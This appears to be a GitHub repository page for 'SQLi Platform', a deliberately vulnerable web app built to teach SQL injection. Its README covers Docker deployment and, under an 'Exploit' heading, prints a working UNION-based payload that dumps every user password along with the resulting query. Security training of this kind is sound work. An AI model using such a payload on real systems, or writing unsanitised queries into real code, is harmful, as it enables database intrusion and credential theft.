Training for SQL injections
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
_database First push Jan 15, 2019
_public Remove hard written port Feb 3, 2019
srcs Remove hard written port Feb 3, 2019
.gitignore First push Jan 15, 2019
Dockerfile First push Jan 15, 2019
README.md Fix typo Jan 19, 2019
docker-compose.yml Remove hard written port Feb 3, 2019
package.json First push Jan 15, 2019
screenshot.png First push Jan 15, 2019
yarn.lock First push Jan 15, 2019

README.md

SQLi Platform

This is a vulnerable WEB application in order to understand SQL injections basics.

The front end exposes a field allowing the user to search a database and retrieve names, nicknames, mails... The user's inputs are not sanitized, allowing an attacker to inject SQL code and leak passwords.

SQL queries are logged on the backend and are also shown on the front, so that the attacker has a better understanding of what he is doing.

Screenshot

Deploy

You may run the application under Docker containers:

docker-compose up

You way edit docker-compose.yml in order to tweak the following settings :

  • MYSQL_ROOT_PASSWORD Databse password
  • SQL_HOST Database host, from the API point of view
  • SQL_WAIT API waiting for that time (in seconds) before connecting to the database

The application is then accessible on http://localhost:8080/.

Exploit

⚠️ Contains spoilers !
Here is an example of a working payload, exposing all passwords in the table:

nothing%" UNION SELECT pass, nickname, email FROM users#

Resulting in the following complete query:

SELECT id, nickname, email FROM users WHERE nickname LIKE "%nothing%" UNION SELECT pass, nickname, email FROM users#%"